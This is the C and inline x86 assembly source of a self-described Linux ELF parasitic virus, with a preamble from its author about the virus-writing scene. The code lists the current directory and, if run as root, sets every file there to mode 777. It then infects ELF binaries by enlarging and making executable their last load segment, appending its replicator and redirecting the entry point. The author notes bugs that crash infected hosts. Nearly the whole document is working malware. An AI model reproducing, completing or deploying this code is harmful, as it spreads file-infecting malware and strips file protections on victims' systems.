//./gcc -m32 -masm=intel -o file file.c
//https://www.cs.bgu.ac.il/~caspl152/wiki.files/ps05_152.pdf\
//One-oh-one on Linux Virii written by herm1t (x) VxHeavens.com, June 2010

//Since Ive now written a parasite in both x86 formats (Win & Lin)
//Things need to be said about this knowledge and power
//When I 1st began writing viruses (or virii for all those correctedness types
//I strove to be as a good as 29A - still i fall short of such titles
//I owe my mentor herm1t  (and other VXRs) a ton of respect
//for putting up with my constant annoyances of every line and piece of new code
//added - thanks herm1t for not holding my hand (in fact your tutorial insists upon
//c-coding one (why use ASM? more of a challenge, and i save c-code VXng for
//rootkits.) Lulz and thanks to everyone else out there who (because I am bad for
//reputational marketing images) i wont know, but thanks for
//putting up with me, and, my prior VX codes that were not so good (which ill fix up in time)
//The VX scene isnt dead, though the VXR is not looked at too kindly these days
//contrary to those of old days, now that cybermalware has reached the apex of
//causing billions of $$ worth of problems to govt's and systems of the world yearly
//We true VXR who only set out to show knowledge can never condone ruining another
//system but its what you set out to do with this knowledge that makes you
//
//This thing isnt perfect. My itr82 jump is faulty (so no files to infect causes problems.)
//I was going to fix it, until I realized after testing it against 3 hello-world GTK
//and 3 hello-world c-codes that so long as the parasite can eat and live, all programs
//will work fine post-infection. If the parasite has a host the parasite lives on, and so 
//hopefully, with a proper Commensalism relationships in place, so does the host.
//No files to infect, and the infected host seg-faults and dies turning it into
//a Parasitism relationship - but feed it some progs and alive it is again
//This parasite only adds its replicator code, it does no true damage (unless i messed up)
//--"The Lord will even dwell within the darkness" Solomon 1 Kings 8:12

asm(".intel_syntax noprefix\n");

void main()
{
asm(
	
	"_code:\n"
	"call _start\n"
	"_start:\n"
	"pushad\n"
	
//=======================================================================
//GRAB DIRECTORY ENTRIES
//USE STACK SPACE FOR NOW
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	

//		        eax 	        ebx 	                        ecx                                                   edx 	                        esi 	edi
//sys_getdents	0x8d	unsigned int fd	struct linux_dirent __user *dirent	unsigned int count	  -	   -	
	
	"_getdents:\n"
	"push 0x2e\n" //push "." to stack
	"mov ebx,esp\n" //load the reg with it
	"xor ecx,ecx\n" //set option to R_ONLY
	"mov edx,0x400\n" //READ_ONLY
	"mov eax,0x05\n" //call open dir
	"int 0x80\n"
	
	"sub esp,0x500000\n"
	"mov ebx,eax\n"
	"mov eax,0x8d\n" //getdents
	"mov ecx,esp\n" //store to stack
	"mov edx,0x500000\n" //len of reserved space for getdents info
	"int 0x80\n"  //[esp-0x500000] = getdents stuff
	
//=======================================================================
// GOT ROOT?
//IF SO CHMOD ALL FILES
//			eax 	      ebx   ecx   edx   esi   edi
//sys_getuid	0xc7	-	-	-	-	-

"mov eax,0xc7\n"
"int 0x80\n"
"cmp eax,0x00\n" // ROOT=0x00
"jne _root_chmod_skip\n"


//===================================================
//WE GOT ROOT CHMOD RWE ALL FILES 0x777
//ESP = getdents struct
//			eax 	 ebx 	                                ecx 			edx 	esi 	edi
//sys_chmod	0x0f	 const char __user *filename	mode_t mode     -       -       -
	
	"_root_chmod:\n"
	"mov ebp,esp\n"
	"mov ebx,ebp\n"
	
	//EBP=GETDENTS
	//=====================================
	"xor edi,edi\n"
	"_iter8:\n"
	"xor ecx,ecx\n"
	"mov cx,word ptr [ebx+0x08]\n"
	"add ecx,ebx\n"
	"cmp byte ptr[ecx-1],0x00\n"
	"je _root_chmod_skip\n"
	"push ecx\n" //start of next entry
	"cmp byte ptr [ecx-0x01],0x08\n"
	"je _ffound\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter8\n"
	//=====================================
	"_ffound:\n"
	"mov ecx,ebx\n"
	"add ecx,0x0A\n"
	"push ebx\n"
	"mov ebx,ecx\n"  //ebx & ecx=fname
	"mov eax,0x0f\n" //CHMOD
	"mov ecx,0x1ff\n" //RWE ALL USERS
	"int 0x80\n"  //call
	"pop ebx\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter8\n"
	//===================================
	
//=================================================
//CONTINUE WITH
//PRIVS WE HAVE AND HOPE
//FOR THE BEST
//=================================================


	"_root_chmod_skip:\n"
	"mov ebp,esp\n"
	"mov ebx,ebp\n"
	"xor edi,edi\n"
	"_iter82:\n"
	"xor ecx,ecx\n"
	"mov cx,word ptr [ebx+0x08]\n"
	"add ecx,ebx\n"
	"cmp byte ptr[ecx],0x00\n"   //<--------------****safety loop****
	"je _code_end\n"
	"push ecx\n" //start of next entry
	"cmp byte ptr [ecx-0x01],0x08\n"
	"je _ffound2\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter82\n"
	//=====================================
	"_ffound2:\n"
	"mov ecx,ebx\n"
	"add ecx,0x0A\n" //ECX=FNAME
	"push ebx\n"  
	
	"jmp _stat\n"
	"_stat_ret:\n"
	
	
//AT THIS POINT
//[EDI]=HEAP START
//[EBP]=GETDETNS INFO
//[ESI]=FSIZE
//[ESP]= ->GETDENTS.FNAME@0x0A

	"jmp _fopen\n"
	"_fopen_ret:\n"
	"jmp _fread\n"
	"_fread_ret:\n"
	"jmp _is_elf\n"
	"_is_elf_ret:\n"
	
	//infect ELF heap
	//write ELF heap to file
	//close 
	
	"pop ebx\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter82\n"
	//===================================
 
//===========================================
//IS IT AN ELF FILE?
"_is_elf:\n"

"cmp dword ptr[edi],0x464c457f\n"  //.FLE
"jne _is_elf_ret\n"
"cmp byte ptr[edi+0x04],0x01\n" //x86 file?
"jne _is_elf_ret\n"
"cmp byte ptr[edi+0x05],0x01\n" //LSB?
"jne _is_elf_ret\n"

"xor eax,eax\n"
"mov al,byte ptr[edi+0x28]\n"
"xor ecx,ecx\n"
"mov cx,word ptr[edi+0x2a]\n"
"xor edx,edx\n"
"mov dx,word ptr[edi+0x2c]\n"

"add eax,edi\n"

"_hdr_iter8:\n"
"cmp dword ptr[eax],0x01\n"
"je _hdr_mod\n"
"cmp dword ptr[eax],0x07\n"
"ja _is_elf_ret\n"

"_itr8_rep:\n"
"add eax,ecx\n"
"jmp _hdr_iter8\n"

"_hdr_mod:\n"
//[eax]=P_hdr_start
"cmp [eax+0x08],esi\n"
"jb _itr8_rep\n" 

"mov ecx,[eax+0x1c]\n" //ecx=seg_align
"add ecx,ecx\n"
"mov edx,[eax+0x14]\n"
"add edx,ecx\n"
"or edx,0x0fff\n"
"xor edx,0xfff\n" //edx=align*2    +  p_fsize| ||  
"mov [eax+0x14],edx\n"
"mov [eax+0x10],edx\n" //file_heap_fsize & memsize incr
"mov edx,0x00000007\n"
"mov [eax+0x18],edx\n" //last seg is RWE



//lets store the orig_ep into an unreserved header location
//and head to EOF
"mov ecx,edi\n"
"mov edx,[ecx+0x18]\n" //edx=orig EP
"mov [ecx+0x0c],edx\n"  //@file_heap[elf_hdr+0x0c]=host orig_ep
"mov ecx,edi\n"
"add ecx,esi\n"

//=========================================
//WE ADJUSTED THE LAST LOAD SEGMENT
//WE ADDED 0x1000 2 HEAP WHEN ALLOCATED
//NOW ADD IN SHELL+PARASITIC CODE
"pushad\n"  //save reg state
"call _delta\n"
"_delta:\n"

"mov edi,ecx\n"
"pop esi\n" //esi should have code start loc.
"sub esi,0x124\n"
"mov ecx,0x280\n" //# of bytes
"rep movsb\n"

//=========================================

//NOTE: change Orig_ep ->shell

"mov ecx,[esp]\n" //ecx=ELF in heap
"add ecx,0x18\n"
//edi = eof+para_end

//get current base
"call _delta2\n"
"_delta2:\n"
"pop ecx\n"
"or ecx,0xfff\n"
"xor ecx,0xfff\n"

//eax = heap file_last_seg
//ecx = orig host ep seg 
//edx = orig host ep value
//esi = orig host ep seg 0xfff
//edi = heap file eof
//esp = heaped file
//[esp+0x04] = fsize host
//edi-0x200 = host eof parasite start
//[esp+0x1c] = ptr -> last seg 
//get last seg align
//calc va of parasite and write it into host ep
//calc host orig ep and write opcode jump to it
//get parasite start location -> EOF_host

//write "X" infected
//add cmp to detect eof "x"

"mov ebx,edi\n"
"sub ebx,0x200\n"
"push ebx\n"
"mov ebx,eax\n"
"add ebx,0x1c\n"
"mov ebx,[ebx]\n"
"add [esp],ebx\n"
"pop ebx\n"
"push edx\n"
"mov edx,[esp+0x04]\n"
"add edx,0x18\n"
"or ebx,0xffff0000\n"
"xor ebx,0xffff0000\n"

"mov ecx,eax\n"
"add ecx,0x1c\n"
"mov ecx,[ecx]\n"
"mov ebx,[esp+0x08]\n"
"add ebx,ecx\n"
"mov [edx],ebx\n" //hello == 4cac
"pop edx\n"


//============================================================
//			eax 		ebx 				ecx 					edx 			esi 	edi
//sys_write	0x04	unsigned int fd	const char __user *buf	size_t count	-	-
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	

"mov eax,0x05\n"
"mov ebx,[esp+0x20]\n"
"add ebx,0x0a\n"
"mov ecx,0x02\n"
"mov edx,0x700\n"
"int 0x80\n"
"mov ebx,eax\n"
"mov eax,0x04\n"
"mov ecx,[esp]\n"
"mov edx,[esp+0x04]\n"
"add edx,0x1000\n"
"int 0x80\n"
//============================================================









"popad\n" //restore reg state
"jmp _code_end\n" //DEBUG******** 1-file COMMENT****** all-files

"jmp _is_elf_ret\n"
//===========================================


//==================================================
//		  eax        ebx 	                         ecx 	                         edx 	esi 	edi
//sys_read	  0x03   unsigned int fd	char __user *buf	size_t count	  -	   -
"_fread:\n"

"mov ebx,eax\n"
"mov eax,0x03\n"
"mov ecx,edi\n"
"mov edx,esi\n"
"int 0x80\n"

"jmp _fread_ret\n"
//===================================================
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	
"_fopen:\n"

"mov ebx,[esp]\n"
"add ebx,0x0a\n"
"mov eax,0x05\n"
"mov ecx,0x02\n"
"mov edx,0x700\n"
"int 0x80\n"

"cmp eax,0x00\n"
"jge _fopen_ret\n"

"pop ebx\n"
"pop ecx\n"
"mov ebx,ecx\n"
"jmp _iter82\n"
	



//"jmp _fopen_ret\n"

//=============================================
//		        eax 		ebx 					ecx 						edx 	esi 	edi													
//sys_newstat	0x6a	char __user *filename	struct stat __user *statbuf	  -	  -	  -
"_stat:\n"
"sub esp,0x100\n"
"mov eax,0x6a\n"
"mov ebx,ecx\n"
"mov ecx,esp\n"
"int 0x80\n"
//[ecx+0x14]=fsize

	//=====================================
	"_heap_alloc:\n"
	"mov eax,0x2d\n"
	"mov ebx,edi\n"
	"int 0x80\n"
	"mov ebx,eax\n"
	"add ebx,[ecx+0x14]\n" //fix
	"add ebx,0x00001000\n"  //fsize+virus_size****************
	"mov eax,0x2d\n"
	"int 0x80\n"
	"sub eax,[ecx+0x14]\n" //fix
	"sub eax,0x00001000\n" //fsize+virus_size*****************
	//========================
	//CHANGE HEAP TO RWE PRIVS
	"mov edx,0x07\n"
	"mov ebx,eax\n"
	"mov eax,0x7d\n"
	"int 0x80\n"
	//EBX = HEAP ADDRESS RWE
	//========================
	"mov edi,ebx\n"   //EDI=HEAP START
	"mov esi,[esp+0x14]\n"  //ESI=FSIZE
	"add esp,0x100\n"
 	
"jmp _stat_ret\n"


"nop\n"
"nop\n"

//==============================================



//NOTE:JMP TO ORIG HOST EP	
	
	"_code_end:\n"
	"add esp,0x500000\n" //return our stack to its orig state
	
	"add esp,0xc\n"
	"popad\n"
	"pop ecx\n"
	
	"mov edi,[eax]\n"
	"mov ecx,edi\n"
	"add ecx,0x0c\n"
	"add edi,[ecx]\n"
	"xor ecx,ecx\n"
	"jmp edi\n"
	




//================================================
//================================================
//================================================
	
	
	"mov eax,0x01\n"
	"int 0x80\n"
	"nop\n"
	"nop\n"
	"nop\n"
	);
}

 
